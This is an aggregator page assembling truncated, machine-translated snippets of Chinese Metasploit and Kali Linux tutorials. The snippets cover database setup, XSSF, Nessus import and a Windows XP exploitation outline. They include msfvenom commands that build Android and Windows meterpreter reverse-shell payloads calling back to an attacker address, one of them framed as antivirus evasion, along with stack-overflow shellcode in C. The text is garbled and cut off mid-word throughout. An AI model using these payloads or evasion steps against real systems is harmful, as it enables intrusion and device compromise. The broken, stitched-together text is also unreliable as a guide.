Disclaimer (read only !) : The original translations of all tutorials provided by this blog are from the Internet and are only for learning and communication purposes. Do not conduct commercial communications. At the same time, do not remove this statement when reprinting. In the event of any dispute, it has nothing to do with the owner of this blog and the person who published the translation. Thank you for your cooperation!
Original article link: http://k0st.wordpress.com/2011/12/18/
After installing Kali Linux
First step: Switch update source for System Software update, edit system source file: Vi/etc/apt/sources.list
Comment The official source, and add the domestic update source, because the domestic faster, my side is Kali Linux rolling (some people also called Kali Linux 2016.1), I chose the source of Zhong Ke (paste out the source address)
Deb Http://mirrors.ustc.edu.cn/kali kali-rolling main Non-free contribDEB-SRC Http://mirrors.ustc.edu.cn/kali kali-rolling main No
This paper describes in detail the Python method of remote call Metasploit, which has a good reference value for Python learning. The implementation methods are as follows:
(1) Installing the Python Msgpack class library, the data serialization standard in the MSF official documentation is the reference to Msgpack.
root@kali:~# apt-get Install python-setuptools
root@kali:~# Easy_install
(2) Create Createdb_sql.txt:
Create databa
p163 XSSFThe default Kali 2.0 does not have XSSF, first download: https://code.google.com/archive/p/xssf/downloadsUnzip the downloaded zip file, merge the data, plugins, lab and other folders into the appropriate folder in the/usr/share/metasploit-framework/, then load XSSF in Msfconsole.According to the book, but the final attack did not succeed!8 the ['...] ['exploit:windows/browser/ie_createobject'[*] Exploit execution Started, press [CTRL + C] to
Step 1:
Download the metasploitinstallation package from the official website http://www.metasploit.com/
Step 2:
Disable anti-virus software and firewall on your host
Step 3:
For Windows 7, go to Control Panel> region and language> area and change the area to English (us ). Otherwise, an error occurs during PostgreSQL installation and the installation may fail.
Step 4:
Double-click the downloaded Installation File to install it by default. Some may want to change the installation di
KaLi Connecting the PostgreSQL databaseTo see if PostgreSQL is up and not started, start with the service PostgreSQL Start command. After starting to see if the boot was successful, the port is 5432:650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M00/4C/7F/wKioL1Q-kgaSWeZXAAC1T1E06QE255.jpg "title=" 34.png "alt=" Wkiol1q-kgaswezxaac1t1e06qe255.jpg "/>After starting Metasploit, check the connection status of PostgreSQL, the command is: Db_status
Metasploit connecting the PostgreSQL database:1. Turn on the PostgreSQL service: Services PostgreSQL start2. Enter PostgreSQL, set the default user password, create a new user, set new user permissions, create a database:Sudo-u postgres psql# access to PostgreSQL Default userAlter user postgres with password ' password '; #设置默认用户的登录密码Create user ' username ' wiht password ' password ' nocreatedb; #创建带密码的新用户Create database name ' with owner = ' user na
1, first look at the PostgreSQL port, the default is automatically open, Port 7337.[Email protected]:~# netstat-tnpl |grep PostgresTCP 0 0 127.0.0.1:7337 0.0.0.0:* LISTEN 1100/postgresTCP6 0 0:: 1:7337:::* LISTEN 1100/postgres2. View the MSF configuration with database users and Passwords[Email protected]:~# cat/opt/metasploit/config/database.ymlDevelopment:www.2cto.comAdapter: "PostgreSQL"Database: "Msf3dev"Username: "MSF3"Password: "C80c3cea"port:73
First I build an Android app under Kali, that is, the APK format file, the command used is:Msfvenom-p android/meterpreter/reverse_tcp lhost= Local IP lport= listening port R >/root/rb.apkNote:-P: Refers to the payload used in this environment, the payload is the successful Android attack after the rebound connection sent to the attacker's terminal;Lhoost and Lport refer to the local bounce IP address and the local listening port;-r: Indicates the type of file to be generated;>/root/rb.apk: Indic
We first go to this directory to see the contents of the Database.yml file:It's the information we see.Then open Metasploit, run the db_connect instruction link database. The format is:Db_connect User name: password @127.0.0.1: Port/Database nameIn my case, that is:Db_connect MSF: Password @127.0.0.1:5432/msfAfter that, the database is connected.Below is the Nmap scan and store the results:The-ox instruction is to store nmap results in a place of deve
The attack is done under BT5 and the target program is running on an Ubuntu virtual machine.First, you need to figure out what a stack overflow attack is, read morehttp://blog.csdn.net/cnctloveyu/article/details/4236212This article is very clear, but the specific example is not very accurate, a little bit wrong.Here is an example of a modified executable that I have verified.Shell.c1#include 2 3 CharShellcode[] =4 "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 5 "\x89\xf3\x8d
-new_fd 1\n"); - Close (NEW_FD); theExit0); the } theprintf"close-new_fd 2\n"); the Close (NEW_FD); - } theprintf"close-sockfd\n"); the Close (SOCKFD); the}This core is the recvastring function we are concerned with, which contains an obvious stack overflow vulnerability. We look specifically at:1 voidRecvastring (intnew_fd)2 {3UnsignedCharbuff[ -];4 intI=0;5printf"sp=0x%x,addr=0x%x bytes.\n", get_sp (),buff);6 intNumBytes = recv (New_fd,buff,1024x768,0);7 if(numbytes==-1
Metasploit+python generate Kill-free EXE ever the Antivirus1 Generate a bounce MSF python script under Kali, with the following command:Msfvenom-p windows/meterpreter/reverse_tcp lport=443 lhost=192.1681. 102 One-f py-o /opt/bk.py2. Copy the bk.py to the WINDOW32 system and modify it as follows (the red callout here is to modify the added code, other unchanged)From ctypes Import * Import ctypesbuf=""buf+="\xbb\x7a\x62\x0a\x22\xdb\xc9\xd9\x74\x24\x
Basic commandsImport Scan ResultsDb_import/path/file. NessusView existing IP information in the databaseMSF > Db_hosts-c address,svcs,vulns (Note: VULNS is vulnerability vulnerability abbreviation)Displays a list of detailed vulnerabilitiesMSF > Db_vulnsThe first step:Connecting to a databaseMSF > Db_connect postgres:[email protected] Database ip/msf3Step Two:Load NessusStep Three:MSF > Nessus_connect nessus Account: Password @ip: port (default = 8834)MSF > LoadView Plugin HelpMSF > Nessus_helpA
A command injection vulnerability is to have a web app execute a command that was not previously available, which could be an operating system command or a custom script program. In the "Metasploit Penetration Test Devil Training Camp" book, the author of the WordPress plug-in Zingiri the existence of a command injection vulnerability analysis, but the cause of the vulnerability of the explanation is not particularly clear. One, the vulnerability trig
Label:Service PostgreSQL Start[....] Starting PostgreSQL 9.1 database server:main[...] The PostgreSQL server failed to start. Please check the log output:2015-02-07 18:52:12 CST log:could not translate host name "localhost" and service "5432" to add Ress:name or service not known 2015-02-07 18:52:12 CST warning:could not create listen sockets for "localhost" 2015-02-07 18:52:12 CST Fatal:could Not the Create any TCP/IP sockets. [F failed!failed!/etc/hostsAdd "127.0.0.1 localhost"
Build penetration test environment
Kali attack aircraft
WinXP SP1 drone
Start Metasploit
Windows RPC-related vulnerabilities
Internal-provided vulnerability attacks
drone WinXP SP1 network configuration to view the NAT network segment of a virtual machine
Configure IP addresses for WinXP SP1 drone
Perform vulnerability Utilization
Post -exploit:meterpreter>
Drone's information
Process Situation
View 2008 Process migration to explorer.exe P
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.